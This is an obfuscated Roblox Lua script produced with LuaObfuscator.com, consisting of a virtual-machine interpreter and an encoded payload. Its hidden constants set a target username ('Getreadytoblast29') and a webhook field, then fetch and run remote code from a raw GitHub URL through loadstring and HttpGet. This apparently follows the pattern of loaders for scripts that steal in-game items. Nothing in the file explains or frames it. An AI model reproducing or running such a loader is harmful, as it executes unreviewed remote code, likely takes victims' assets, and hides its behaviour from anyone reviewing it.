--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v87=v5(v81,v19);v19=nil;return v87;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/(2^(v32-1)))%((5 -3)^(((v33-(2 -1)) -(v32-(1 -0))) + ((1 + 1) -1))) ;return v82-(v82%(620 -(555 + 64))) ;else local v83=(933 -(857 + 74))^(v32-((90 + 479) -(367 + 201))) ;return (((v31%(v83 + v83))>=v83) and (928 -(214 + 713))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (879 -(282 + 595)) );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * (231 + 25)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (3 -0) );v18=v18 + (1069 -(68 + 997)) ;return (v40 * (16778486 -(226 + 1044))) + (v39 * ((279666 + 5704) -219834)) + (v38 * (373 -(8 + 24 + 85))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=958 -(892 + (1203 -(116 + 1022))) ;local v44=(v20(v42,4 -3 ,12 + 8 ) * ((4 -2)^((1544 -(998 + 488)) -26))) + v41 ;local v45=v20(v42,47 -(9 + 17) ,67 -36 );local v46=((v20(v42,58 -26 )==(351 -(87 + 263))) and  -(181 -(67 + 113))) or (1 + 0) ;if (v45==(791 -(368 + 347 + 76))) then if (v44==(0 -0)) then return v46 * (0 -0) ;else local v88=0 + 0 ;while true do if (v88==(0 -(772 -(201 + 571)))) then v45=953 -(802 + 150) ;v43=442 -(416 + 26) ;break;end end end elseif (v45==(5511 -3464)) then return ((v44==(0 -0)) and (v46 * (((3 -2) + 0)/(997 -(915 + 82))))) or (v46 * NaN) ;end return v8(v46,v45-(2896 -1873) ) * (v43 + (v44/((440 -(145 + 293))^(31 + 21)))) ;end local function v25(v47)local v48=0 -0 ;local v49;local v50;while true do if (v48==0) then v49=nil;if  not v47 then v47=v23();if (v47==(859 -((3854 -3040) + 45))) then return "";end end v48=2 -1 ;end if (v48==(1 + 2)) then return v6(v50);end if (v48==(1 + 1 + 0)) then v50={};for v89=3 -2 , #v49 do v50[v89]=v2(v1(v3(v49,v89,v89)));end v48=888 -(261 + 624) ;end if (v48==(1 -0)) then v49=v3(v16,v18,(v18 + v47) -(1081 -((3511 -2491) + 60)) );v18=v18 + v47 ;v48=1425 -(630 + (2540 -(760 + 987))) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=1587 -(412 + 1175) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v51~=(0 -0)) then else v52=0;v53=nil;v51=1;end if (v51~=(2 + 1)) then else v58=nil;v59=nil;v51=2 + 2 ;end if (v51~=(3 -1)) then else v56=nil;v57=nil;v51=1277 -(388 + 886) ;end if ((5 -1)~=v51) then else v60=nil;while true do if (v52~=0) then else local v95=0 + 0 ;while true do if ((560 -(306 + 254))==v95) then v53=0;v54=nil;v95=1 + 0 ;end if (v95==1) then v52=1 -0 ;break;end end end if (1~=v52) then else local v96=1467 -(899 + 568) ;while true do if (v96~=1) then else v52=2 + 0 ;break;end if (v96~=(0 -0)) then else v55=nil;v56=nil;v96=1;end end end if (v52~=(606 -(268 + 335))) then else local v97=0;while true do if (v97==(291 -(60 + 230))) then v52=4;break;end if (v97~=0) then else v59=nil;v60=nil;v97=573 -(426 + 146) ;end end end if (v52==4) then while true do if (v53==(1 + 2)) then v60=nil;while true do local v102=0;while true do if (v102==(1457 -(282 + 1174))) then if (v54~=0) then else local v153=0;local v154;while true do if (v153~=(811 -(569 + 242))) then else v154=0;while true do if (v154~=0) then else local v162=0 -0 ;while true do if (v162~=(0 + 0)) then else local v166=0;while true do if ((1024 -(706 + 318))~=v166) then else v55={};v56={};v166=1;end if (v166==1) then v162=1252 -(721 + 530) ;break;end end end if ((1272 -(945 + 326))~=v162) then else v154=1;break;end end end if (v154~=2) then else v54=2 -1 ;break;end if (v154==(1 + 0)) then v57={};v58={v55,v56,nil,v57};v154=1088 -(461 + 625) ;end end break;end end end break;end if (v102~=0) then else if (v54==1) then local v155=0;local v156;while true do if (v155==0) then v156=1288 -(993 + 295) ;while true do if (2~=v156) then else v54=1 + 1 ;break;end if ((1171 -(418 + 753))==v156) then local v163=0 + 0 ;while true do if (v163~=0) then else v59=v23();v60={};v163=1 + 0 ;end if (v163~=(1 + 0)) then else v156=1;break;end end end if (v156==(1 + 0)) then local v164=0;while true do if (0==v164) then for v168=530 -(406 + 123) ,v59 do local v169=0;local v170;local v171;local v172;while true do if (v169~=(1770 -(1749 + 20))) then else v172=nil;while true do if (v170==(1 + 0)) then if (v171==(1323 -(1249 + 73))) then v172=v21()~=0 ;elseif (v171==2) then v172=v24();elseif (v171==3) then v172=v25();end v60[v168]=v172;break;end if (v170==(0 + 0)) then v171=v21();v172=nil;v170=1146 -(466 + 679) ;end end break;end if ((0 -0)==v169) then v170=0;v171=nil;v169=1;end end end v58[8 -5 ]=v21();v164=1901 -(106 + 1794) ;end if (v164~=(1 + 0)) then else v156=1 + 1 ;break;end end end end break;end end end if (v54~=(5 -3)) then else local v157=0 -0 ;local v158;while true do if (v157==(114 -(4 + 110))) then v158=584 -(57 + 527) ;while true do if ((1427 -(41 + 1386))~=v158) then else local v165=103 -(17 + 86) ;while true do if (v165~=1) then else v158=1 + 0 ;break;end if (v165==(0 -0)) then for v173=1,v23() do local v174=0 -0 ;local v175;local v176;local v177;while true do if (v174~=(167 -(122 + 44))) then else v177=nil;while true do if (1~=v175) then else while true do if (v176==(0 -0)) then v177=v21();if (v20(v177,1,3 -2 )~=(0 + 0)) then else local v182=0;local v183;local v184;local v185;local v186;while true do if (v182~=2) then else while true do if ((1 + 2)~=v183) then else if (v20(v185,3,5 -2 )==(66 -(30 + 35))) then v186[3 + 1 ]=v60[v186[1261 -(1043 + 214) ]];end v55[v173]=v186;break;end if (v183~=(7 -5)) then else local v188=0;while true do if (v188~=(1213 -(323 + 889))) then else v183=3;break;end if (v188==(0 -0)) then if (v20(v185,581 -(361 + 219) ,321 -(53 + 267) )~=1) then else v186[2]=v60[v186[1 + 1 ]];end if (v20(v185,415 -(15 + 398) ,984 -(18 + 964) )==1) then v186[3]=v60[v186[3]];end v188=1;end end end if (v183~=1) then else v186={v22(),v22(),nil,nil};if (v184==(0 + 0)) then local v192=850 -(20 + 830) ;local v193;while true do if ((0 + 0)==v192) then v193=0;while true do if (0==v193) then v186[129 -(116 + 10) ]=v22();v186[4]=v22();break;end end break;end end elseif (v184==1) then v186[1 + 2 ]=v23();elseif (v184==(740 -(542 + 196))) then v186[3]=v23() -(2^16) ;elseif (v184~=3) then else local v202=0;local v203;while true do if (v202==(0 -0)) then v203=0 + 0 ;while true do if (v203~=0) then else v186[2 + 1 ]=v23() -(2^16) ;v186[2 + 2 ]=v22();break;end end break;end end end v183=2;end if (v183==0) then local v189=0;while true do if (v189==1) then v183=1;break;end if (0~=v189) then else v184=v20(v177,4 -2 ,3);v185=v20(v177,4,15 -9 );v189=1552 -(1126 + 425) ;end end end end break;end if ((406 -(118 + 287))~=v182) then else v185=nil;v186=nil;v182=7 -5 ;end if ((1121 -(118 + 1003))~=v182) then else v183=0 -0 ;v184=nil;v182=378 -(142 + 235) ;end end end break;end end break;end if ((0 -0)==v175) then local v181=0 + 0 ;while true do if (v181==0) then v176=977 -(553 + 424) ;v177=nil;v181=1;end if (v181==1) then v175=1;break;end end end end break;end if (v174==(0 -0)) then v175=0;v176=nil;v174=1 + 0 ;end end end for v178=1 + 0 ,v23() do v56[v178-(1 + 0) ]=v28();end v165=1;end end end if ((1 + 0)==v158) then return v58;end end break;end end end v102=1;end end end break;end if (v53~=(0 + 0)) then else v54=0 -0 ;v55=nil;v53=1;end if (v53~=(2 -1)) then else local v98=0 -0 ;local v99;while true do if (0==v98) then v99=0;while true do if (v99==1) then v53=1 + 1 ;break;end if (v99~=(0 -0)) then else local v159=0;while true do if (1==v159) then v99=754 -(239 + 514) ;break;end if (v159~=0) then else v56=nil;v57=nil;v159=1;end end end end break;end end end if (v53~=2) then else local v100=0;local v101;while true do if (v100~=0) then else v101=0;while true do if (v101==(1 + 0)) then v53=1332 -(797 + 532) ;break;end if (v101==(0 + 0)) then v58=nil;v59=nil;v101=1 + 0 ;end end break;end end end end break;end if (v52~=2) then else v57=nil;v58=nil;v52=6 -3 ;end end break;end if (v51~=1) then else v54=nil;v55=nil;v51=2;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v84=0,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=9) then if (v80<=4) then if (v80<=1) then if (v80==0) then do return;end else v71=v79[3];end elseif (v80<=2) then v63[v79[3]]=v77[v79[2]];elseif (v80==3) then do return;end else v77[v79[2]]=v63[v79[3]];end elseif (v80<=6) then if (v80==5) then local v106=v79[2];local v107,v108=v70(v77[v106](v13(v77,v106 + 1 ,v79[3])));v72=(v108 + v106) -1 ;local v109=0;for v127=v106,v72 do v109=v109 + 1 ;v77[v127]=v107[v109];end else local v110=0;local v111;while true do if (v110==0) then v111=v79[2];v77[v111]=v77[v111](v13(v77,v111 + 1 ,v72));break;end end end elseif (v80<=7) then local v112=0;local v113;local v114;local v115;local v116;while true do if (v112==1) then v72=(v115 + v113) -1 ;v116=0;v112=2;end if (v112==2) then for v150=v113,v72 do local v151=0;while true do if (v151==0) then v116=v116 + 1 ;v77[v150]=v114[v116];break;end end end break;end if (v112==0) then v113=v79[2];v114,v115=v70(v77[v113](v13(v77,v113 + 1 ,v79[3])));v112=1;end end elseif (v80==8) then v77[v79[2]]=v79[3];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=14) then if (v80<=11) then if (v80>10) then local v117=0;local v118;local v119;while true do if (1==v117) then v77[v118 + 1 ]=v119;v77[v118]=v119[v79[4]];break;end if (v117==0) then v118=v79[2];v119=v77[v79[3]];v117=1;end end elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=12) then v77[v79[2]]=v79[3];elseif (v80==13) then local v135=v79[2];v77[v135]=v77[v135](v13(v77,v135 + 1 ,v72));else v77[v79[2]]();end elseif (v80<=16) then if (v80>15) then v77[v79[2]]=v63[v79[3]];else v71=v79[3];end elseif (v80<=17) then v63[v79[3]]=v77[v79[2]];elseif (v80==18) then local v137=v79[2];local v138=v77[v79[3]];v77[v137 + 1 ]=v138;v77[v137]=v138[v79[4]];else v77[v79[2]]();end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203113O004765747265616479746F626C6173743239030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F70726F63617436393432302F48617379536372697074732F6D61696E2F486173795363726970742E6C756103083O00557365724E616D6503073O00576562682O6F6B035O00163O00120C3O00013O0026093O000D0001000200040F3O000D000100120C000100043O001211000100033O001204000100053O001204000200063O00200B00020002000700120C000400084O0007000200044O000D00013O00022O000E00010001000100040F3O001500010026093O00010001000100040F3O0001000100120C000100043O001211000100093O00120C0001000B3O0012110001000A3O00120C3O00023O00040F3O000100012O00033O00017O00",v9(),...);
